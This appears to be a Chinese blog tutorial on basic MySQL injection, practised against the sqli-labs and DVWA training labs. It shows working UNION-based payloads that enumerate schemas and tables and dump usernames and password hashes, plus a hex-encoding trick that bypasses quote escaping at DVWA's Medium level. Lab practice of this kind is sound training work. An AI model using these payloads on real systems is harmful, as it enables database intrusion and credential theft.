首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
MySQL表的增删改查基础教程
Apr 07 MySQL
MySQL之高可用集群部署及故障切换实现
Apr 22 MySQL
IDEA 链接Mysql数据库并执行查询操作的完整代码
May 20 MySQL
MySQL 外键约束和表关系相关总结
Jun 20 MySQL
详解MySQL多版本并发控制机制(MVCC)源码
Jun 23 MySQL
mysql事务隔离级别详情
Oct 24 MySQL
Mysql外键约束的创建与删除的使用
Mar 03 MySQL
MySQL学习之基础操作总结
Mar 19 MySQL
Windows下载并安装MySQL8.0.x 版本的完整教程
Apr 10 MySQL
Mysql 文件配置解析介绍
May 06 MySQL
MySQL数据库安装方法与图形化管理工具介绍
May 30 MySQL
mysql通过group by分组取最大时间对应数据的两种有效方法
Sep 23 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
滚动条(1) svg(1) Debian(1) 鸿蒙(2) Sunmao(1) win7(2) 输入法(2) 蓝屏(1) 鸿蒙3.0(1) 声卡驱动(1)
You might like
easyui的tabs update正确用法分享
2014/03/21 PHP
PHP模块化安装教程
2016/06/01 PHP
常用PHP数组排序函数归纳
2016/08/08 PHP
ThinkPHP使用getlist方法实现数据搜索功能示例
2017/05/08 PHP
THINKPHP3.2使用soap连接webservice的解决方法
2017/12/13 PHP
scrollWidth,clientWidth,offsetWidth的区别
2015/01/13 Javascript
jQuery通过控制节点实现仅在前台通过get方法完成参数传递
2015/02/02 Javascript
Javascript基础_标记文字的实现方法
2016/06/14 Javascript
下一代Bootstrap的5个特点 超酷炫!
2016/06/17 Javascript
jQuery UI结合Ajax创建可定制的Web界面
2016/06/22 Javascript
在Web项目中引入Jquery插件报错的完美解决方案(图解)
2016/09/19 Javascript
为Jquery EasyUI 组件加上清除功能的方法(详解)
2017/04/13 jQuery
vue 实现全选全不选的示例代码
2018/03/29 Javascript
js正则相关知识点专题
2018/05/10 Javascript
js的新生代垃圾回收知识点总结
2019/08/22 Javascript
jquery插件懒加载的示例
2020/10/24 jQuery
[06:04]DOTA2英雄梦之声Vol19卓尔游侠
2014/06/20 DOTA
[04:29]DOTA2亚洲邀请赛小组赛第一日 TOP10精彩集锦
2015/02/01 DOTA
使用PyCharm配合部署Python的Django框架的配置纪实
2015/11/19 Python
Django将默认的SQLite更换为MySQL的实现
2019/11/18 Python
Python浮点数四舍五入问题的分析与解决方法
2019/11/19 Python
关于numpy中eye和identity的区别详解
2019/11/29 Python
给 TensorFlow 变量进行赋值的方式
2020/02/10 Python
Pytorch 使用 nii数据做输入数据的操作
2020/05/26 Python
深入了解Python enumerate和zip
2020/07/16 Python
Selenium获取登录Cookies并添加Cookies自动登录的方法
2020/12/04 Python
Pycharm 跳转回之前所在页面的操作
2021/02/05 Python
详解CSS3选择器:nth-child和:nth-of-type之间的差异
2017/09/18 HTML / CSS
英国复古和经典球衣网站:Vintage Football Shirts
2018/10/05 全球购物
大学校运会广播稿
2014/02/03 职场文书
学校安全生产月活动总结
2014/07/05 职场文书
临时用工协议书范本
2014/10/29 职场文书
2014保险公司个人工作总结
2014/12/09 职场文书
党建工作汇报材料
2014/12/24 职场文书
写给医院的感谢信
2015/01/22 职场文书
Python四款GUI图形界面库介绍
2022/06/05 Python